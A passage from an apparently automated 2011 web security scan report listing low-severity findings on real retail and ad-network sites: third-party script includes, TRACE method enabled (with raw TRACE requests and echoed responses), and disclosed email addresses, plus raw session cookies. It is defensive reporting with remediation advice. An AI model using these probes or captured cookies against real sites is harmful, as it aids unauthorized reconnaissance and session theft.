Cookie: JSESSIONID=17jLNQBXSqTLZLn22gSGhQZ1qn1JzhCKMpsNG12T0S6Y29Lzpcvx!-2120161015; otc_visitor_id=U6c411c8e35469d5c3d093388c1dc89a2; otc_new_mktg_visitor=21758503; mt.v=1.322159034.1305510206640; CoreM_State=61~1.0~-1~-1~E~3~3~5~3~3~7~7~|~~|~~|~~|~||||||; fsr.s={"v":1,"rid":"1305510222528_763877","pv":1,"to":3,"c":"http://www.orientaltrading.com/","lc":{"d0":{"v":1,"s":true}},"cd":0,"sd":0}

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:58:38 GMT
Connection: close
Content-Length: 98049

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

...[SNIP]...
</script>
<script type="text/javascript" src="https://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

18.47. http://www.petco.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.petco.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://edge.liveclicker.net/scripts/jquery.liveclicker.v1-11_c.js

Request

GET /?AID=10413444&PID=2537521&cm_mmc=CJ-_-CID-_-2537521-_-10413444 HTTP/1.1
Host: www.petco.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MP=CJ=1&CJExpiry=6/19/2011 6:42:10 PM&CJ_AFFILIATEENTEREDDATE=5/15/2011 6:42:10 PM; Basket=AffiliateCJExpiryDate=6/19/2011 6:42:10 PM&PID=2537521&AID=10413444; SL_Audience=423|Accelerated|92|7|0; SL_UVId=28F6BEFE806000C3; SL_NV7=1|7; CMAVID=none; cmTPSet=Y; VisitHistorySession=; VisitHistory=LastDirectVisitDate=5/15/2011 6:42:24 PM; __utmz=215766422.1305510193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=215766422.2089458932.1305510193.1305510193.1305510193.1; __utmc=215766422; __utmv=215766422.SL_TS_Accelerated; __utmb=215766422.1.10.1305510193; mt.v=1.1314269718.1305510194589; RES_TRACKINGID=256672559073194; RES_SESSIONID=18709185067564; ResonanceSegment=2; CoreAt=90002311=1|1|0|0|0|0|0|0|0|0|0|0|1|1305510189|14_16_18_20_21_22_25_|&; SAVId=vid%3DjAZPvJCAn9TzbA3IqjIS0BXWEqTAhP6H%3Bnvid%3D1%3Bcvid%3D1%3Bplen%3D88%3Bpid%3D55d11a247d01f4c640b3ba5752e78685d%3Bpdx%3D88%3Bglen%3D243%3Bgid%3Df47055609695b3445280ada1f0e6c4c5%3Bgdx%3D89%3Bpt%3D61781%3B; SASId=sid%3DVbDccytV4V9vowfK3PHnkrtcS6teMKbe%3Bcsid%3D1%3Bnsid%3D1%3Blut%3D1305510836562%3B

Response

18.48. http://www.petsmart.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.petsmart.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://cdn.mercent.com/js/tracker.js
http://ipinvite.iperceptions.com/Invitations/Javascripts/ip_Layer_Invitation_903.aspx
http://pet.imageg.net/include/shoprunner/js/shoprunner_init.js
http://pet.imageg.net/include/swfobject.js
http://pet.imageg.net/js/gomez-gtagb4_noobj.js
http://pet.imageg.net/min-cat/site-head-js.xml.min.js

Request

GET / HTTP/1.1
Host: www.petsmart.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=yYyYNQQfpxN12n6YXhzXGV2xP1vJDfygpGLyGrCyZRxwh4NLZ5r0!574538188; browser_id=125602041944; __g_u=321577027175173_1_1_0_5_1305941958166_1; __utmz=113636102.1305509971.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=113636102.773639997.1305509971.1305509971.1305509971.1; __utmc=113636102; __utmb=113636102.1.10.1305509971; mr_referredVisitor=0; mt.v=1.1365981912.1305509972396; s_pers=%20s_nr%3D1305509972462%7C1308101972462%3B%20s_lastvisit%3D1305509972464%7C1400117972464%3B%20gpv_p27%3DHome%2520Page%7C1305511772467%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|26E8402A85161A9C-600001A4C022CD09[CE]; __g_c=w%3A1%7Cb%3A2%7Cr%3A%7Cc%3A321577027175173%7Cd%3A1%7Ca%3A1%7Ce%3A1%7Cf%3A0%7Ch%3A1%7Cg%3A1

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:53:01 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Set-Cookie: sr_token=null; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 66572

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<script src="http://pet.imageg.net/min-cat/site-head-js.xml.min.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script language="JavaScript" type="text/javascript" src="http://pet.imageg.net/include/shoprunner/js/shoprunner_init.js"></script>
...[SNIP]...


<script type="text/javascript" src="http://pet.imageg.net/include/swfobject.js"></script>
...[SNIP]...


<script type="text/javascript" src="http://pet.imageg.net/include/swfobject.js"></script>
...[SNIP]...


<script type="text/javascript" src="http://pet.imageg.net/include/swfobject.js"></script>
...[SNIP]...


<script src="http://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...


<script type="text/javascript" defer="defer" src="http://ipinvite.iperceptions.com/Invitations/Javascripts/ip_Layer_Invitation_903.aspx"></script>
...[SNIP]...

18.49. https://www.petsmart.com/checkout/index.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.petsmart.com
Path:	/checkout/index.jsp

Issue detail

The response dynamically includes the following script from another domain:

https://cdn.mercent.com/js/tracker.js

Request

Response

18.50. http://www.redcrossstore.org/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.redcrossstore.org
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://4qinvite.4q.iperceptions.com/1.aspx?sdfc=c2a66788-6407-a272c64b-fc18-476d-936c-65e0697df414&lID=1&loc=4q-web1

Request

Response

18.51. http://www.redcrossstore.org/dp.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.redcrossstore.org
Path:	/dp.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://4qinvite.4q.iperceptions.com/1.aspx?sdfc=c2a66788-6407-a272c64b-fc18-476d-936c-65e0697df414&lID=1&loc=4q-web1

Request

Response

18.52. http://www.redcrossstore.org/shopper/prodlist.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.redcrossstore.org
Path:	/shopper/prodlist.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://4qinvite.4q.iperceptions.com/1.aspx?sdfc=c2a66788-6407-a272c64b-fc18-476d-936c-65e0697df414&lID=1&loc=4q-web1

Request

Response

18.53. http://www.siteadvisor.com/download/windows.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.siteadvisor.com
Path:	/download/windows.html

Issue detail

The response dynamically includes the following script from another domain:

http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US

Request

Response

18.54. http://www.toshibadirect.com/td/b2c/laptops.to previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.toshibadirect.com
Path:	/td/b2c/laptops.to

Issue detail

The response dynamically includes the following script from another domain:

https://ssl.google-analytics.com/urchin.js

Request

Response

18.55. https://www.toshibadirect.com/td/b2c/myaccount.to previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.toshibadirect.com
Path:	/td/b2c/myaccount.to

Issue detail

The response dynamically includes the following script from another domain:

https://ssl.google-analytics.com/urchin.js

Request

GET /td/b2c/myaccount.to HTTP/1.1
Host: www.toshibadirect.com
Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tais.current.segment=HHO; BV_IDS=cccdadfdidkkkjmcgfkceghdgngdglo.0:@@@@1170188602.1305510022@@@@; s_vi=[CS]v1|26E84051851D3EE4-40000143C043A343[CE]; ysm_CK1K17SBM0N76O75C93SIIUNQINTO=ysm_PV1K17SBM0N76O75C93SIIUNQINTO:2&ysm_SN1K17SBM0N76O75C93SIIUNQINTO:1305510047274&ysm_LD1K17SBM0N76O75C93SIIUNQINTO:0; s_pers=%20s_vnum%3D1308102050353%2526vn%253D1%7C1308102050353%3B%20omtr_eVar45_cvp%3D%255B%255B'Direct%252520Load'%252C'1305510050403'%255D%255D%7C1463362850403%3B%20s_invisit%3Dtrue%7C1305513075995%3B%20omtr_lv%3D1305511275997%7C1400119275997%3B%20omtr_lv_s%3DFirst%2520Visit%7C1305513075997%3B%20s_nr%3D1305511275999%7C1308103275999%3B%20omtr_pv%3DSearch%253ALaptops%2520Home%2520Page%7C1305513076003%3B; s_sess=%20s_cc%3Dtrue%3B%20omtr_eVar49%3DD%253Dc49%3B%20s_ppv%3D34%3B%20SC_LINKS%3DSearch%253ALaptops%2520Home%2520Page%255E%255EMy%2520Account%255E%255ESearch%253ALaptops%2520Home%2520Page%2520%257C%2520My%2520Account%255E%255E%3B%20c_m%3DundefinedDirect%2520LoadDirect%2520Load%3B%20s_sq%3Dtoshibadirectprod%252Ctoshibaglobal%253D%252526pid%25253DSearch%2525253ALaptops%25252520Home%25252520Page%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.toshibadirect.com%2525252Ftd%2525252Fb2c%2525252Fmyaccount.to%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:45:00 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0c
Set-Cookie: tais.current.segment=HHO;Expires=Fri, 15-Jul-2011 10:45:00 GMT
Set-Cookie: tais.current.segment=HHO;Expires=Fri, 15-Jul-2011 10:45:00 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 74134

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


...[SNIP]...

<script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

18.56. http://www.travelguard.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.travelguard.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

https://seal.verisign.com/getseal?host_name=www.travelguard.com&size=S&use_flash=YES&use_transparent=YES&lang=en

Request

GET / HTTP/1.1
Host: www.travelguard.com
Proxy-Connection: keep-alive
Referer: http://www.travelguard.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=www.travelguard.com&SiteLanguage=1033; EktGUID=a15d51f4-28a7-4b4a-80f5-62beb814a8df; EkAnalytics=newuser; ASP.NET_SessionId=xj4zcmmhhzhxmb30ab3nfl45; s_pers=%20s_pers_prop19%3Dus_direct%7C1463190243517%3B%20gpv_pageName%3Dus_direct%253A/%7C1305512043622%3B%20s_depth%3D1%7C1305512043625%3B%20s_pers_prop21%3D000329%7C1463190243630%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B

Response

19. TRACE method is enabled previous next
There are 17 instances of this issue:

http://ads.al.com/
http://bp.specificclick.net/
http://d.xp1.ru4.com/
http://image2.pubmatic.com/
http://img.bluenile.com/
http://login.dotomi.com/
http://media.gnc.com/
http://media.gsimedia.net/
http://metrics.pacsun.com/
http://pixel.rubiconproject.com/
http://pixel.traveladvertising.com/
http://s.xp1.ru4.com/
http://secure-us.imrworldwide.com/
http://srv.clickfuse.com/
http://sv.liveclicker.net/
http://wasc.homedepot.ca/
https://www.toshibadirect.com/

Issue description

The TRACE method is designed for diagnostic purposes. If enabled, the web server will respond to requests which use the TRACE method by echoing in its response the exact request which was received.

Although this behaviour is apparently harmless in itself, it can sometimes be leveraged to support attacks against other application users. If an attacker can find a way of causing a user to make a TRACE request, and can retrieve the response to that request, then the attacker will be able to capture any sensitive data which is included in the request by the user's browser, for example session cookies or credentials for platform-level authentication. This may exacerbate the impact of other vulnerabilities, such as cross-site scripting.

Issue remediation

The TRACE method should be disabled on the web server.

19.1. http://ads.al.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.al.com
Path:	/

Request

TRACE / HTTP/1.0
Host: ads.al.com
Cookie: b004cd50ea31f91e

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:02:59 GMT
Server: Apache/2.0.63 (CentOS)
Connection: close
Content-Type: message/http
Set-Cookie: NSC_mc-pbt-qspe=ffffffff090d165f45525d5f4f58455e445a4a423660;expires=Mon, 16-May-2011 02:12:59 GMT;path=/;httponly

TRACE / HTTP/1.0
Host: ads.al.com
Cookie: b004cd50ea31f91e
Connection: Keep-Alive
OAS_IP: 173.193.214.243

19.2. http://bp.specificclick.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bp.specificclick.net
Path:	/

Request

TRACE / HTTP/1.0
Host: bp.specificclick.net
Cookie: fd5bd5e79f305054

Response

HTTP/1.1 200 OK
Server: WebStar 1.0
Content-Type: message/http
Content-Length: 72
Date: Mon, 16 May 2011 01:54:10 GMT
Connection: close

TRACE / HTTP/1.0
host: bp.specificclick.net
cookie: fd5bd5e79f305054

19.3. http://d.xp1.ru4.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d.xp1.ru4.com
Path:	/

Request

TRACE / HTTP/1.0
Host: d.xp1.ru4.com
Cookie: 7f1582bfe75f4676

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Mon, 16 May 2011 01:58:24 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Content-type: message/http
Connection: close

TRACE / HTTP/1.0
Host: d.xp1.ru4.com
Cookie: 7f1582bfe75f4676

19.4. http://image2.pubmatic.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://image2.pubmatic.com
Path:	/

Request

TRACE / HTTP/1.0
Host: image2.pubmatic.com
Cookie: c5745af3e64116b7

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:54:36 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: image2.pubmatic.com
Cookie: c5745af3e64116b7

19.5. http://img.bluenile.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://img.bluenile.com
Path:	/

Request

TRACE / HTTP/1.0
Host: img.bluenile.com
Cookie: 1902b04d7ae02bb4

Response

HTTP/1.1 200 OK
Server: Footprint 4.6/FPMCP
Mime-Version: 1.0
Date: Mon, 16 May 2011 02:03:13 GMT
Content-Type: message/http
Content-Length: 107
Expires: Mon, 16 May 2011 02:03:13 GMT
Connection: close

TRACE / HTTP/1.0
Host: img.bluenile.com
Cookie: 1902b04d7ae02bb4
_FP_X_URL: http://img.bluenile.com/

19.6. http://login.dotomi.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://login.dotomi.com
Path:	/

Request

TRACE / HTTP/1.0
Host: login.dotomi.com
Cookie: 59d03fe332c4b546

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:54:04 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: login.dotomi.com
Cookie: 59d03fe332c4b546

19.7. http://media.gnc.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://media.gnc.com
Path:	/

Request

TRACE / HTTP/1.0
Host: media.gnc.com
Cookie: f56496a421f70914

Response

19.8. http://media.gsimedia.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://media.gsimedia.net
Path:	/

Request

TRACE / HTTP/1.0
Host: media.gsimedia.net
Cookie: 545adb96173c7251

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:56:27 GMT
Server: Apache/1.3.37 (Unix)
P3P: policyref="http://media.gsimedia.net/p3p.xml", CP="BUS COM COR DEVa DSP NAV NOI OUR PRE STA TAIa UNI"
Connection: close
Content-Type: message/http

TRACE /index.html HTTP/1.0
Cookie: 545adb96173c7251
Host: media.gsimedia.net

19.9. http://metrics.pacsun.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://metrics.pacsun.com
Path:	/

Request

TRACE / HTTP/1.0
Host: metrics.pacsun.com
Cookie: d454b6f06560be7a

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:00:28 GMT
Server: Omniture DC/2.0.0
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: metrics.pacsun.com
Cookie: d454b6f06560be7a
Connection: Keep-Alive
X-Forwarded-For: 173.193.214.243

19.10. http://pixel.rubiconproject.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.rubiconproject.com
Path:	/

Request

TRACE / HTTP/1.0
Host: pixel.rubiconproject.com
Cookie: 576ea5ef7a3e3506

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:01:49 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: pixel.rubiconproject.com
Cookie: 576ea5ef7a3e3506
Connection: Keep-Alive
X-Forwarded-For: 173.193.214.243

19.11. http://pixel.traveladvertising.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.traveladvertising.com
Path:	/

Request

TRACE / HTTP/1.0
Host: pixel.traveladvertising.com
Cookie: ab56f008fab1262d

Response

HTTP/1.1 200 OK
Content-Type: message/http
Content-Length: 184
Connection: Close

TRACE / HTTP/1.1
Host: pixel.traveladvertising.com
Cookie: ab56f008fab1262d
X-Forwarded-For: 173.193.214.243
X-Forwarded-Port: 80
X-Forwarded-Proto: http
Connection: keep-alive

19.12. http://s.xp1.ru4.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://s.xp1.ru4.com
Path:	/

Request

TRACE / HTTP/1.0
Host: s.xp1.ru4.com
Cookie: 537b0e1e2aed386a

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Mon, 16 May 2011 01:57:55 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Content-type: message/http
Connection: close

TRACE / HTTP/1.0
Host: s.xp1.ru4.com
Cookie: 537b0e1e2aed386a

19.13. http://secure-us.imrworldwide.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secure-us.imrworldwide.com
Path:	/

Request

TRACE / HTTP/1.0
Host: secure-us.imrworldwide.com
Cookie: 9b9331fb7d46202c

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:00:13 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: 9b9331fb7d46202c
Host: secure-us.imrworldwide.com

19.14. http://srv.clickfuse.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://srv.clickfuse.com
Path:	/

Request

TRACE / HTTP/1.0
Host: srv.clickfuse.com
Cookie: 9986882a195c500e

Response

HTTP/1.1 200 OK
Content-Type: message/http
Date: Mon, 16 May 2011 02:02:59 GMT
Server: Apache
Content-Length: 176
Connection: Close

TRACE / HTTP/1.1
host: srv.clickfuse.com
Cookie: 9986882a195c500e
X-Forwarded-For: 173.193.214.243
X-Forwarded-Port: 80
X-Forwarded-Proto: http
Connection: keep-alive

19.15. http://sv.liveclicker.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sv.liveclicker.net
Path:	/

Request

TRACE / HTTP/1.0
Host: sv.liveclicker.net
Cookie: 6e68b12f0aa92f35

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:59:03 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: sv.liveclicker.net
Cookie: 6e68b12f0aa92f35

19.16. http://wasc.homedepot.ca/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://wasc.homedepot.ca
Path:	/

Request

TRACE / HTTP/1.0
Host: wasc.homedepot.ca
Cookie: 1ebe89bfb65b24e8

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:54:11 GMT
Server: Omniture DC/2.0.0
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: wasc.homedepot.ca
Cookie: 1ebe89bfb65b24e8
Connection: Keep-Alive
X-Forwarded-For: 173.193.214.243

19.17. https://www.toshibadirect.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.toshibadirect.com
Path:	/

Request

TRACE / HTTP/1.0
Host: www.toshibadirect.com
Cookie: 388c0f6b4a6b7eb1

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:45:01 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0c
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.toshibadirect.com
Cookie: 388c0f6b4a6b7eb1

20. Email addresses disclosed previous next
There are 42 instances of this issue:

http://ads.adbrite.com/adserver/vdi/684339
http://ads.adbrite.com/adserver/vdi/684339
http://ads.adbrite.com/adserver/vdi/684339
http://buy.travelguard.com/tgi2/js/siteCatalyst.js
http://hire.jobvite.com/CompanyJobs/Careers.aspx
http://hire.jobvite.com/CompanyJobs/careers_8.js
https://ordering.ftd.com/new-signup/
https://ordering.ftd.com/reminder-signin/
https://ordering.ftd.com/signin/
http://pics.bluenile.com/1526758349/bundles/diamondsearch.js
https://secure.bhphotovideo.com/FrameWork/js/common.js
https://secure.bhphotovideo.com/FrameWork/js/jquery/jquery.styledDropdown.min.js
https://secure.bluenile.com/accounts/account-sign-in.html
http://shop.pacsun.com/home.jsp
http://shoprunner.force.com/content/JsContentElementsGNC
http://shoprunner.force.com/content/JsContentElementsPET
http://static.bhphotovideo.com/FrameWork/js/common.js
http://www.acehardware.com/js/LIB_core.js
https://www.acehardware.com/checkout/index.jsp
https://www.acehardware.com/common/checkout/js/jsu-1.0.js
https://www.acehardware.com/js/LIB_core.js
http://www.armaniexchange.com/category/customer+service/where+is+my+order/check+order+status.do
http://www.bhphotovideo.com/FrameWork/js/common.js
http://www.bhphotovideo.com/FrameWork/js/jquery/jquery.placeHolder.js
http://www.bhphotovideo.com/FrameWork/js/jquery/jquery.styledDropdown.min.js
http://www.bluenile.com/
http://www.bluenile.com/build-your-own-diamond-ring
http://www.bluenile.com/engagement-rings
http://www.brookstone.com/protoculous_102.js
https://www.brookstone.com/protoculous_102.js
http://www.ftd.com/
http://www.ftd.com/sweet-shop-ctg/product-sweet-shop/
https://www.gnc.com/common/checkout/js/jsu-1.0.js
https://www.guitarcenter.com/includes/guitarcenter/GuitarCenter.css
https://www.guitarcenter.com/includes/guitarcenter/scripts/jquery.colorbox-min.js
https://www.helzberg.com/includes/jquery/plugins/jquery.hoverIntent.minified.js
http://www.petsmart.com/js/LIB_core.js
https://www.petsmart.com/checkout/index.jsp
https://www.petsmart.com/js/LIB_core.js
https://www.restorationhardware.com/assets/js/jquery/plugins/jquery.cookie.js
https://www.restorationhardware.com/assets/js/jquery/plugins/jquery.pngFix.js
http://www.travelguard.com/

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).

20.1. http://ads.adbrite.com/adserver/vdi/684339 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.adbrite.com
Path:	/adserver/vdi/684339

Issue detail

The following email address was disclosed in the response:

4dd08403@fls.doubleclick.net

Request

Response

20.2. http://ads.adbrite.com/adserver/vdi/684339 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.adbrite.com
Path:	/adserver/vdi/684339

Issue detail

The following email address was disclosed in the response:

4dd084c2@www.imiclk.com

Request

Response

20.3. http://ads.adbrite.com/adserver/vdi/684339 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.adbrite.com
Path:	/adserver/vdi/684339

Issue detail

The following email address was disclosed in the response:

4dd087f4@fls.doubleclick.net

Request

GET /adserver/vdi/684339?d=110 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=1564432;type=homep126;cat=homep272;ord=1;num=3072598970029.503?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362027x0.066+1305478400x1093175211"; srh="1%3Aq64FAA%3D%3D"; rb2=CjQKBjY4NDMzORi15I_7EiIkNGRkMDdiYzgtZTk3Yi0xMThjLTNkZWMtN2I4YzVjMzA2NTMwCiMKBjc0MjY5NxiFveHZECITNDMyNTg5NzI4OTgzNjQ4MTgzMAokCgY3NTMyOTIY1732uhciFEFHLTAwMDAwMDAxMzg5MzU4NTU0EAE; ut="1%3APcw5DoAgEADAv2xNwdEgvwHBxAt0SUQC%2FF2lsJ1iClwcVIHV5RTQRlCAfhpzZWjsxiurlJxDuGWHJXSIcs%2F2BX0I8YPuQNMHQMBo7x3OfYTWHg%3D%3D"; vsd=0@1@4dd083be@www.imiclk.com; rb=0:684339:20838240:4dd07bc8-e97b-118c-3dec-7b8c5c306530:0:742697:20828160:4325897289836481830:0:753292:20858400:AG-00000001389358554:0

Response

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Mon, 16 May 2011 02:12:04 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: rb2=ChMKBjY4NDMzORjfydH7EiIDMTEwCiMKBjc0MjY5NxiFveHZECITNDMyNTg5NzI4OTgzNjQ4MTgzMAokCgY3NTMyOTIY1732uhciFEFHLTAwMDAwMDAxMzg5MzU4NTU0EAE; path=/; domain=.adbrite.com; expires=Sun, 14-Aug-2011 02:12:04 GMT
Set-Cookie: ut="1%3APcw5DoAgEADAv2xNwdEgvwHBxAt0SUQC%2FF2lsJ1iClwcVIHV5RTQRlBwDuGWlaGxS6isUoJ%2BGnOHjXeIcs%2F2BX0I8YPuQNMHQMBo7x3OfYTWHg%3D%3D"; path=/; domain=.adbrite.com; expires=Thu, 13-May-2021 02:12:04 GMT
Set-Cookie: vsd=0@1@4dd087f4@fls.doubleclick.net; path=/; domain=.adbrite.com; expires=Wed, 18-May-2011 02:12:04 GMT
